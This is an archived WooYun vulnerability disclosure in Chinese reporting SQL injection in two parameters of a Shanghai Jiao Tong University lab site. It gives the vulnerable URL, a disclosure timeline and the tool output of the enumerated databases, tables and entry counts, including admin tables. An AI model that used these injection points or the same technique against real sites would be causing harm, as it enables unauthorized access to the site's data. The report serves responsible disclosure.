乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-06: 细节已通知厂商并且等待厂商处理中 2015-02-06: 厂商已经确认,细节仅向厂商公开 2015-02-16: 细节向核心白帽子及相关领域专家公开 2015-02-26: 细节向普通白帽子公开 2015-03-08: 细节向实习白帽子公开 2015-03-23: 细节向公众公开
上海交大某分站存在多处SQL注射
存在 分站上海交通大学人工结构及量子调控教育部重点实验室http://klasqc.physics.sjtu.edu.cn/DetailInfo.php?id=78&num=22参数id 跟num都存在注射
available databases [2]:[*] db_web_klasqc[*] information_schema
Database: db_web_klasqc[16 tables]+---------------------------------------+| Eadmin || Earticle || Efriendlink || Ehtmlcontent || Eteacher || admin || article || articletype || earticletype || eimagelink || et || friendlink || htmlcontent || im || imagelink || teacher |+---------------------------------------+Database: information_schema[17 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || KEY_COLUMN_USAGE || PROFILING || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: db_web_klasqc+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| article | 116 || Earticle | 84 || articletype | 25 || earticletype | 21 || Eteacher | 14 || teacher | 14 || Ehtmlcontent | 12 || et | 12 || htmlcontent | 12 || Efriendlink | 7 || friendlink | 7 || eimagelink | 5 || im | 5 || imagelink | 5 || admin | 2 || Eadmin | 2 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 294 || COLLATION_CHARACTER_SET_APPLICABILITY | 126 || COLLATIONS | 126 || CHARACTER_SETS | 36 || TABLES | 33 || KEY_COLUMN_USAGE | 16 || SCHEMA_PRIVILEGES | 16 || STATISTICS | 16 || TABLE_CONSTRAINTS | 16 || SCHEMATA | 2 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+
危害等级:高
漏洞Rank:15
确认时间:2015-02-06 20:35
谢谢,处理中
暂无